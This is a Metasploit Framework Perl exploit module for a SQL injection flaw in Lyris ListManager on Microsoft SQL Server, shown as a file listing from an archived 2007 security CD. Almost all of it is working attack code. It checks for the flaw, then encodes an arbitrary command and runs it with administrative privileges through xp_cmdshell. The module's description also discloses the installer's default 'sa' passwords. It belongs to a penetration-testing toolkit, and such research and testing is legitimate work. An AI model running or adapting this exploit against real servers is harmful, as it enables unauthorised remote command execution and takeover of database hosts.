home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / lyris_attachment_mssql.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  4.0 KB  |  157 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::lyris_attachment_mssql;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'  => 'Lyris ListManager Attachment SQL Injection (MSSQL)',
  20.     'Version'  => '$Revision: 1.3 $',
  21.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
  22.     'Arch'  => [ ],
  23.     'OS'    => [ 'win32' ],
  24.     'Priv'  => 1,
  25.     'UserOpts'  =>
  26.       {
  27.         'RHOST' => [1, 'ADDR', 'The target address'],
  28.         'RPORT' => [1, 'PORT', 'The target port', 80],
  29.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  30.       },
  31.  
  32.     'Payload' =>
  33.       {
  34.           'Space' => 1000,
  35.         'Keys'  => ['cmd'],
  36.       },
  37.  
  38.     'Description'  => Pex::Text::Freeform(qq{
  39.         This module exploits a SQL injection flaw in the Lyris ListManager
  40.     software for Microsoft SQL Server. This flaw allows for arbitrary commands
  41.     to be executed with administrative privileges by calling the xp_cmdshell
  42.     stored procedure. Additionally, a window of opportunity is opened during the
  43.     ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'
  44.     for a 5-10 minute period. After the installer finishes, the password is
  45.     permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).
  46. }),
  47.  
  48.     'Refs'  =>
  49.       [
  50.         ['URL',   'http://metasploit.com/research/vulns/lyris_listmanager/'],
  51.         ['OSVDB', '21548'],
  52.       ],
  53.       
  54.     'DefaultTarget' => 0,
  55.     'Targets' =>
  56.       [
  57.         ['No target needed.'],
  58.       ],
  59.  
  60.     'Keys' => ['lyris'],
  61.   };
  62.  
  63. sub new {
  64.     my $class = shift;
  65.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  66.     return($self);
  67. }
  68.  
  69. sub Check {
  70.     my $self = shift;
  71.     my $target_host = $self->GetVar('RHOST');
  72.     my $target_port = $self->GetVar('RPORT');
  73.  
  74.     my $s = Msf::Socket::Tcp->new
  75.       (
  76.         'PeerAddr'  => $target_host,
  77.         'PeerPort'  => $target_port,
  78.         'LocalPort' => $self->GetVar('CPORT'),
  79.         'SSL'       => $self->GetVar('SSL'),
  80.       );
  81.     if ($s->IsError) {
  82.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  83.         return $self->CheckCode('Connect');
  84.     }
  85.  
  86.     $s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
  87.  
  88.     my $r = $s->Recv(-1, 5);
  89.  
  90.     if ($r =~ /Unclosed quotation mark before/) {
  91.         $self->PrintLine("[*] Vulnerable installation detected ;)");
  92.         return $self->CheckCode('Detected');
  93.     }
  94.     
  95.     if ($r =~ /SQL error reported from Lyris/) {
  96.         $self->PrintLine("[*] Vulnerable installation, but not running MSSQL.");
  97.         return $self->CheckCode('Safe');
  98.     }
  99.     
  100.     if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {
  101.         $self->PrintLine("[*] This system appears to be patched");
  102.         return $self->CheckCode('Safe');    
  103.     }
  104.     
  105.     $self->PrintLine("[*] Unknown response, patched or invalid target.");
  106.     return $self->CheckCode('Safe');
  107. }
  108.  
  109. sub Exploit {
  110.     my $self = shift;
  111.     my $target_host = $self->GetVar('RHOST');
  112.     my $target_port = $self->GetVar('RPORT');
  113.     my $target_idx  = $self->GetVar('TARGET');
  114.  
  115.     my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
  116.  
  117.     my $sql = 
  118.         'DECLARE @X NVARCHAR(4000);'.
  119.         'SET @X= ';
  120.  
  121.     foreach my $c (unpack('C*', $cmd)) {
  122.         $sql .= "CHAR($c) + ";
  123.     }
  124.     $sql .= "'\x20';";
  125.     $sql .= 'EXEC MASTER..XP_CMDSHELL @X';
  126.  
  127.     my $url = "/read/attachment/1;".Pex::Text::URLEncode($sql).";--";
  128.  
  129.  
  130.     my $request =
  131.       "GET $url HTTP/1.1\r\n".
  132.       "Host: $target_host:$target_port\r\n\r\n";
  133.  
  134.     my $s = Msf::Socket::Tcp->new
  135.       (
  136.         'PeerAddr'  => $target_host,
  137.         'PeerPort'  => $target_port,
  138.         'LocalPort' => $self->GetVar('CPORT'),
  139.         'SSL'       => $self->GetVar('SSL'),
  140.       );
  141.     if ($s->IsError) {
  142.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  143.         return;
  144.     }
  145.  
  146.     $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
  147.     $s->Send($request);
  148.  
  149.     $self->PrintLine("[*] Waiting for a response...");
  150.     $s->Recv(-1, 10);
  151.     $self->Handler($s);
  152.     $s->Close();
  153.     return;
  154. }
  155.  
  156. 1;
  157.